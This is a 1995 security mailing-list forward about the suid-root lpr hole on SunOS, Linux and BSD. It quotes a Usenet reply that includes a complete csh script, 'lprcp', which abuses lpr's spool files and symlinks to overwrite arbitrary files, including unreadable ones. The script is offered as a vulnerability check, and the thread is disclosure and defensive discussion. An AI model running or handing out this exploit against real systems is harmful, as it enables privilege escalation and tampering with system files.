[301] in linux-security and linux-alert archive
(fwd) Re: suid root lpr
daemon@ATHENA.MIT.EDU (Cy Schubert - BCSC Open Systems Gr)
Thu Jul 27 03:07:53 1995
Date: Mon, 24 Jul 1995 10:07:40 -0700
From: Cy Schubert - BCSC Open Systems Group <cschuber@uumail.gov.bc.ca>
To: owner-linux-security@tarsier.cv.nrao.edu
I've noticed a bit of discussion about the lpr/lpd hole in the
comp.security.unix newsgroup. As seen below the problem affects other
commercial operating systems as well.
Regards, Phone: (604)389-3827
Cy Schubert OV/VM: BCSC02(CSCHUBER)
Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET
BC Systems Corp. Internet: cschuber@uumail.gov.bc.ca
cschuber@bcsc02.gov.bc.ca
"Quit spooling around, JES do it."
> IUP Computer Science Club (compclub@grove.iup.edu) wrote:
> : I am wondering if lpr suid root is truly secure. Of course no suid root
> : program is truly secure, but does anyone know of any particular holes?
> : If there was a way to call a user made filter, instead of the printcap
> : called filter, could one achieve a shell escape from there? Is it
> : in any way possible to call a filter from other than within the untouchable
> : printcap ?
> : Any help would be appreciated. I know lpr need not be suid root, but I
> : am still curious. Thanks.
>
> It still is insecure. If you have a printer set up from many of the
> commercial or shareware unix OS's (SunOS, Linux, BSD) you may or may not
> be vulnerable. Here is a program to see if you are or not. Run it from a
> non-privlidged account and see what comes up.
>
> Its a relatively simple program, but gives you an idea of what damage
> could be done in somebody else's hands. Please don't use this to exploit
> or damage other people's systems - that isn't what i post it here for. I
> post it here so that people can be saved the headache and time wasted of
> a hacker intrusion.
>
> good luck,
>
> andrew
>
> #!/bin/csh -f
> #
> # Usage: lprcp from-file to-file
> #
>
> if ($#argv != 2) then
> echo Usage: lprcp from-file to-file
> exit 1
> endif
>
> # This link stuff allows us to overwrite unreadable files,
> # should we want to.
> echo x > /tmp/.tmp.$$
> lpr -q -s /tmp/.tmp.$$
> rm -f /tmp/.tmp.$$ # lpr's accepted it, point it
> ln -s $2 /tmp/.tmp.$$ # to where we really want
>
> @ s = 0
> while ( $s != 999) # loop 999 times
> lpr /nofile >&/dev/null # doesn't exist, but spins the clock!
> @ s++
> if ( $s % 10 == 0 ) echo -n .
> end
> lpr $1 # incoming file
> # user becomes owner
> rm -f /tmp/.tmp.$$
> exit 0
>
